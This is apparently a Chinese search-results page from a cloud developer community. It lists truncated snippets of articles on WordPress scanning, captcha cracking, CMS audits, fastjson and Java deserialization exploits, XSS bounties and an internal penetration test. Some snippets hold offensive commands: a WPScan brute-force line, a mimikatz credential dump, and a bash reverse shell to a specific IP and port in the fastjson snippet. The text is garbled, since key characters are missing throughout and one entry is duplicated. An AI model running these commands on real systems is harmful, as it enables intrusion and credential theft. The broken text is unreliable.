展开

关键词

WPScan-WordPress

今天分享一个web扫描工具——WPScan WPScan是一个专门扫描WordPress网站的工具,目前已经在很多系统中预安装: BackBox LinuxKali LinuxPentooSamuraiWTFBlackArch libxml2 libxml2-dev libxslt1-dev build-essential libgmp-dev 安装完组件后,可以通过命令ruby wpscan.rb --update 更新数据库 更新的文件中,几个json文件都比较大,而且是从国外下载的,所以网络环境不好的时候基本会出一下错误? 暴力破解ruby wpscan.rb --url --wordlist --username --threads 扫描插件ruby wpscan.rb --url --enumerate p 可以看到红色叹号的即是的提醒,还会有参考的url,可以通过提供的参考来修复。注意:若wordpress目录结构生改变,需要在指定url的时候指定到wordpress的目录。

19820

svg-captcha的巨大日志

最新更新,svg-captcha即将布3.0,修复该详情issue:https:github.comproducksv... ----以下原文可能有部分nodejs开者因为安装图形库很麻烦,都用svg-captcha来生成图形验证码svg-captcha: https:www.npmjs.compackage...它有不少优点 然而它最大的一个缺点就是,太容易被破解了,是我刚破解的(其实是我在2019年,第一次知道它后没多久,无意中破解方法的,直到在才有空提交代码)破解指的是,很容易被机器识别,识别率达100%,并且不需要任何机器学习有关的知识 如果没有兴趣看下面那么长,可以直接看识别代码:https:github.comhauasvg-c...流程刚接触svg-captcha的时候就在想,它到底为防止识别做了哪些操作,然后仔细对比相同字母 ,每次生成相同字母的轮廓,不一致的地方相当多: image.png 这样看来,即使是相同字母,它的svg path,也是完全不一样的,看来如果要破解,确实只能先把它转为位图,再做图像识别了。

70720
  • 广告
    关闭

    云产品限时秒杀

    云服务器1核2G首年38元,还有多款热门云产品满足您的上云需求

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    一次CMS源码审计与

    从中选取了一个DM企业建站的cms用作练习,在还原了练习中的后尝试对其进行代码审计,运用近期学习到的php审计知识点对该cms进行了审计,并很幸运的了一枚远程代码执行。 接下来详细记录了的过程与大家交流学习。0x01 环境搭建选用了XAMPP 与 DM企业建站v20190522 进行代码审计。 但是该文件也是经常出的位置,本次审计的CMS也是出在安装部分,具体细节如下: 位置 :install.php if($act==doit){ echo ; $local = htmlentitdm

    45040

    对某大型网站的逻辑

    本文作者:少年英雄宋人头(Ms08067实验室成员)什么是逻辑逻辑产生是因为编写代码时人的思维逻辑产生的不足导致的应用程序在逻辑上的缺陷,与传统的WEB相比,逻辑无法通过扫描进行识别 实战案例--某大型网站的验证绕过在对某大型网站进行测试的过程,存在一个修改密码的页面,而且这个页面的格式有种似曾相识的感觉(之前提交过一个类似的密码重置)第一反应是,这个位置是不是存在类似的 首先,修改密码需要提交注册邮箱(这个邮箱是盲猜的,应该是之前某大神测试的时候留下的),然后送一下验证码,并且随意填写六位验证码(至于为啥是六位,当然是因为页面存在提示)。? 点击下一步后,抓取服务器的返回包,将false修改为true;0修改为1,然后送返回包。?

    18410

    对话近期多个DoD者Alyssa Herrera

    自从16岁接触到众测之后,Alyssa Herrera从此就热爱上了这个行业。作为众测社区为数不多的女性白帽,Alyssa Herrera的成就极具代表性。 在美国国防部“Hack The Pentagon”众测项目中,她以多个高危和52个量的优异成绩,两次跻身排行榜第二。 另外的方式就是要明确一些规则,比如当白帽RCE或SSRF这类高危时应该如何处理。我记得雅虎有个众测项目就明确说明,当你高危时,应该运行哪些命令来确认具体可以获取的系统权限。? 多数时候是那些响应很慢的公司,可能上报的最终需要几个月的时间都会被检查分类,有的公司甚至就直接关闭报告了,遇到这样的事情会让我非常沮丧,特别是一些严重都会存在这种情况。 当然,最大的建议就是,多去阅读一些分析文章(writeup)和公开,这样你就会培养起一些和上报意识。

    26140

    记一次护网到域控全过程

    具体实践中,公安部会组织攻防两方,进攻方会在一个月内对防守方动网络攻击,检测出防守方(企事业单位)存在的安全。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。 start=SGKGCABCRS 【需访问国外网站后才可正常访问】2.通过翻看邮件内容边缘资产并通过反序列化拿到webshellimage.pngWeblogic的路径一般可以通过类似路径查找 非交互式抓明文密码(webshell中)C:mimikatz.exe privilege::debug sekurlsa::logonpasswords > pssword.txtimage.png内网转利用 image.pngimage.pngimage.png经过查看域管理员信息,如果只有这个登陆过(也有可能多个域管理账户都登录过) 就用netsess.exe 或是psloggedon之类的工具查下他在是否还在线 image.png 域控hash导出登录域控的服务器上抓取所有用户的Hash值可参考我之前写的下面两篇详细攻略利用ProxyShell获取域控所有Hash无需免杀获取域控hash小技巧最好整理记录提交至裁判处

    15030

    Android新:同WiFi网络可窃取SD卡内容

    根据安全研究人员布的最新公告显示他们又找到一个能够威胁大部分Android设备的最新。该主要出在WebView编程接口方面,开者能够通过该接口来让本地应用实网页端的相关功能。 安全研究公司表示“目前的该至少能够实远程下载手机SD卡上的内容,并能够捕获应用程序的相关数据等功能。” 此外研究者还对目前Google Play商城出售的最畅销100款应用进行了检测,有62款应用存在“潜在”威胁,非常容易受到该的攻击。

    41650

    记我的一次账号劫持和BLIND XSS过程

    大家好,本文我要分享的是我参与Hackerone某邀请项目,通过目标测试网站的高级功能模块(PRO features)实了更多攻击面测试,并了两个严重,获得了$7000美金的不菲奖励。 第一个-账号劫持我的第一个就是不安全对象引用(IDOR),利用该我能在每个账户中创建一个 element x元素,经过和朋友的交流,他建议我可以试试在其中注入一些 javascript 在,有了这种IDOR下的存储型XSS利用路径,而且目标测试网站又没有设置CSP的白名单机制,因此我可以构造一段小脚本,让这段脚本来窃取受害用户的CSRF令牌认证信息(CSRF token),这样可以修改其 与IDOR利用相同, javascript 脚本可以在所有账户中实远程存储,然后通过构造运行,实对所有目标网站注册账户的劫持,这就是XSS和IDOR的结合威力。 通过这种测试方式,我能查看到将近1000多名顾客的电子票记录和信息。以下显示的是姓名和地址字段的XSS触信息:?上报了这个之后,我又获得了厂商团队 $3500 美金的奖励。

    42800

    实战 | fastjson 与测试

    Nday 实战系列文章中的一篇,目前知识星球已更新至 41 篇,目标 50 篇,欢迎加入知识星球查看更多原创内容,本月 12 日开启 2021 年度最后一期 SRC 实战训练营,欢迎参见,详情参见《SRC 批量自动化之武功秘籍 如何存在 Fastjson 的网站从 fastjson 形成的原因看,是目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,这就给了攻击者可乘之机 所以寻找存在 Fastjson 的方法,就是先找到参数中内容是 json 数据的接口,然后使用构造好的测试 payload 进行提交验证,检测原理跟 sql 注入差不多,首先找到参数提交的地方,然后再用 ,需要依赖反连平台,具体配置可参考官方配置文档:https:docs.xray.cool#configrationreverse扫描结果如图点击该结果,会有详情,及测试数据包:利用 DNSLOG 验证基于以上目标 cp fastjson_tool.jar fastjson.HRMIServer 0.0.0.0 9999 bash=bash -i >&devtcp103.80.27.1658888 0>&1第二步:

    20210

    Java反序列化:在受限环境中从到获取反向Shell

    前言Java反序列化可以说是Java安全的一块心病,近年来更是在安全界“出尽风头”。 Pickles》的报告,就详细描述了Java反序列化可以利用Apache Commons Collections这个常用的Java库来实任意代码执行,甚至还提供了相应的Payload生成工具ysoserial 正如挑战中所提到的,易受攻击的页面从用户输入中获取Base64格式的序列化Java对象,并不加过滤的对其进行反序列化操作。 我们将通过提供一个序列化对象来利用这个,该对象将触面向属性的编程链(POP链)以在反序列化期间实远程命令执行。? 利用在,让我们继续下一步操作。点击exploitation选项卡以实任意命令执行。?从提示信息来看,这个错误应该来自ysoserial。我们回到控制台看看究竟是什么问题。?

    47420

    网站跳转劫持与修复建议

    在挖掘网站的时候我们很多网站存在域名跳转的情况,下面我们来详细的讲解一下。域名劫持跳转,也可以叫做url重定向,简单来讲就是在原先的网址下,可以使用当前域名跳转到自己设定的劫持网址上去。 充值接口绕过以及跳转劫持,大部分的平台以及网商城系统都会有充值的页面在充值成功后都会进行跳转到商户的网站上去,在跳转的过程中,我们需要充值一部分金额才能测试出导致存在不存在,只要你勇敢的去尝试, 渗透测试,都会有收获的,针对充值的我们前端时间测试成功过。 关于如何修复网站跳转,我们SINE安全公司建议在程序代码上进行修复,加强域名后输入的字符长度,以及URL地址后的http以及.com.cn等域名字符的限制与安全过滤,对以及特殊的字符以及参数值也加强过滤 时刻提醒网站用户,不要随意的打开其他人过来的网站链接地址,将网站安全做到最大化。

    43020

    PostgreSQL管理工具pgAdmin 4中XSS和利用

    本文我将给大家讲述我是如何及利用pgAdmin4桌面客户端中的XSS。在看完本文之后,请尽快升级到1.4版本。 这也意味着pgAdmin 4用户可以查看不可信数据(主要是来自Web应用的任意数据),也即存在注入攻击。接下来得找一个方法在获得的上下文中完成一些有趣的事情。 对环境观察了一段时间之后,如果可以找到任意一个全局变量或者属于窗口的对象,或许对于我们想像用户般执行操作会有帮助。然而一无所获,大约15分钟后我就放弃了。 3、执行函数select pwn()时间线03-16-2017 – 问题03-17-2017 – 构造exploit03-17-2017 – 向security@postgresql.org进行报告 03-20-2017 – Dave Page确认03-31-2017 – 约一周后更新版本04-10-2017 – 公布补丁

    549100

    计算机芯片重大,可能缩短芯片使用寿命

    美国华盛顿州立大学的一个研究小组,高性能计算机芯片中存在重大的、此前未知的,这些可能导致代电子产品出故障。 研究人员,故意增加恶意工作负载会破坏芯片上的通信系统,大大缩短整个芯片的使用寿命。 一些消费电子产品供应商,如苹果(Apple)和三星(Samsung),被指利用自身电子产品的送软件更新,故意放慢较早型号手机的速度,以鼓励消费者购买新产品。 以前的研究人员研究过计算机芯片组件,如处理器、计算机内存和安全电路,但WSU研究小组,高性能计算机芯片的复杂通信主干存在重大。潘德说:“通讯系统是把一切联系在一起的粘合剂。 研究人员,通信系统中有限数量的关键垂直链接特别容易出故障。这些链接将堆栈中的处理器连接起来,并允许它们彼此通信。潘德说:“我们确定了一个代理如何针对通信系统启动芯片故障。”

    22320

    潜伏17年0day威胁Office全版本 1123台利盟打印机在线暴露

    研究人员在使用Shodan引擎进行搜索时,就了一台在线暴露的打印机似乎属于美国拉斐特市政府办公室。 腾讯安全反病毒实验室安全团队捕获一个潜伏了17年之久的0day——有病毒利用Office公式编辑器中的0day动攻击,潜伏期长达17年之久,威胁大量Office版本,一旦用户打开恶意文档,无需其他操作 此前在微软布的11月份安全补丁中,潜伏长达17年之久的Office远程代码执行(CVE-2017-11882)刚才被修复。 据一位俄罗斯网友,俄罗斯联邦储蓄银行(Sberbank)使用的ATM机就还在运行Windows XP系统,而且存在近乎不可思议的安全,机会任何人都能轻松黑掉它:只需连续按下Shift键五次,系统就会提示是否启动粘滞键功能 17年0day,威胁Office全版本https:www.easyaq.comnews1893060203.shtml中国神秘黑客组织被曝专黑SQL类数据库https:www.easyaq.comnews953498122

    383100

    用BurpSuite实越权(IDOR)的自动识别

    这里分享一个自动化IDOR(越权)的方法,那就是在BurpSuite中利用Autozie和Autorepeater插件实IDOR的探测识别,而无需针对每个请求手动去变化参数或请求。 IDOR(越权):也称“不安全的直接对象引用”,场景生于当用户对内部资源的访问请求,或基于用户提供的输入对象进行访问时,服务端未进行合理的权限验证,导致当前用户可以未经授权访问获取到不属于自己账户权限的资源或数据 我们可以在BurpSuite的插件库Bapp中对Autorize 和 Autorepeater进行安装:用AutorizeIDOR先来看Autorize,对于客户端送的任何请求来说,它会执行一个等效请求 当然,如果收到的状态码是403 Forbidden,那么说明就不存在IDOR,是不行的。 用AutorepeaterIDORAutorepeater可以说是复杂版本的Autorize,它可以针对细化参数实更加准确的测试,如通常涉及到的uuid,、suid、uid等用户参数。

    89600

    从Youtube的视频ID和频道ID中

    id确实与用户实际起更改的视频相对应,也就是说,我可以通过更改这些视频id来实对任意Youtube视频的属性更改。 以下就是该的一个POC验证:演示视频上报进程2018.11.11 上报2018.11.12 分类 - 被评定为好“Nice catch”2018.11.13 奖励2018.11.13 经过研究,我在这个channelId参数数值与用户身份之间,Youtube也未做必要的验证措施。 通过Youtube返回的响应消息我,当某个频道满足一个条件:只有PUBLIC(公开)和UNLISTED(私享)两种播放列表时,我们就能利用该获取到它所有的播放列表资源。 ,所以这个算是一个涉及隐私的

    2.5K30

    Fastjson 又被,这次危害可导致服务瘫痪!

    来源:http:rrd.meerdRQ报告编号:B6-2019-090501报告来源:360-CERT报告作者:360-CERT更新日期:2019-09-050x00 背景2019年9月5日,fastjson 360CERT 判断该危害中。影响面较大。攻击者可以通过送构造好的请求而致使当前线程瘫痪,当送的恶意请求过多时有可能使业务直接瘫痪。 0x01 详情的关键点在com.alibaba.fastjson.parser.JSONLexerBase#scanString中,当传入json字符串时,fastjson会按位获取json字符串 github.comalibabafastjsonpull2692commitsb44900e5cc2a0212992fd7f8f0b1285ba77bb35d#diff-525484a4286a26dcedd7d6464925426f唠嗑下:Fastjson 存在安全 事实上,强如 Jackson 等等,今年也被爆出有安全。我们在使用开源库时,一定要关注库的更新,特别是安全方面的。那么问题就来了,你更新了吗?嘿嘿~

    51450

    fastjson又被,这次危害可导致服务瘫痪!

    0x00 背景 2019年9月5日,fastjson在commit 995845170527221ca0293cf290e33a7d6cb52bf7上提交了旨在修复当字符串中包含x转义字符时可能引 360CERT 判断该危害中。影响面较大。攻击者可以通过送构造好的请求而致使当前线程瘫痪,当送的恶意请求过多时有可能使业务直接瘫痪。 建议广大用户对自身的业务产品进行组件自查,确认fastjson版本至少升级到1.2.600x01 详情的关键点在com.alibaba.fastjson.parser.JSONLexerBase 当fastjson再次向后进行解析时,会不断重复获取EOF,并将其写到内存中,直到触oom错误:?最终效果为:? PS:jackson最近也布了多个版本进行修复。

    41220

    Kali Linux Web渗透测试手册(第二版) - 8.3 - 使用Wapiti

    第八章:使用自动化扫描器在这章节,我们将包括以下小节:8.1、使用Nikto进行扫描8.2、自动化扫描注意事项8.3、使用Wapiti8.4、使用OWASP ZAP进行扫描8.5、使用Skipfish 检测安全8.6、使用WPScan查找WordPress中的8.7、使用JoomScan扫描Joomla中的8.8、使用CMSmap扫描Drupal----8.3、使用Wapiti Wapiti 注射XML外部实体(XXE)注入使用已知的潜在危险文件可绕过的弱.htaccess配置存在提供敏感信息的备份文件(源代码公开)在本文中,我们将使用Wapiti我们的一个测试应用程序中的并生成扫描报告 在这里,我们可以看到Wapiti了12个XSS和5个文件处理。3. 在,单击CrossSite Scripting以查看结果的详细信息。4. 我们确实存在一个XSS。原理剖析我们跳过了这个配置中的盲SQL注入测试(-m“-blindsql”),因为我们已经知道这个应用程序很容易受到攻击。

    59620

    Kali Linux Web渗透测试手册(第二版) - 8.3 - 使用Wapiti

    第八章:使用自动化扫描器在这章节,我们将包括以下小节:8.1、使用Nikto进行扫描8.2、自动化扫描注意事项8.3、使用Wapiti8.4、使用OWASP ZAP进行扫描8.5、使用Skipfish 检测安全8.6、使用WPScan查找WordPress中的8.7、使用JoomScan扫描Joomla中的8.8、使用CMSmap扫描Drupal----8.3、使用Wapiti Wapiti 注射XML外部实体(XXE)注入使用已知的潜在危险文件可绕过的弱.htaccess配置存在提供敏感信息的备份文件(源代码公开)在本文中,我们将使用Wapiti我们的一个测试应用程序中的并生成扫描报告 在这里,我们可以看到Wapiti了12个XSS和5个文件处理。3. 在,单击CrossSite Scripting以查看结果的详细信息。4. 我们确实存在一个XSS。原理剖析我们跳过了这个配置中的盲SQL注入测试(-m“-blindsql”),因为我们已经知道这个应用程序很容易受到攻击。

    28720

    相关产品

    • 漏洞扫描服务

      漏洞扫描服务

      漏洞扫描服务是用于网站漏洞监测的安全服务,为企业提供7×24小时准确、全面的漏洞监测服务,并为企业提供专业的修复建议, 从而避免漏洞被黑客利用,影响企业资产安全…

    相关资讯

    热门标签

    扫码关注云+社区

    领取腾讯云代金券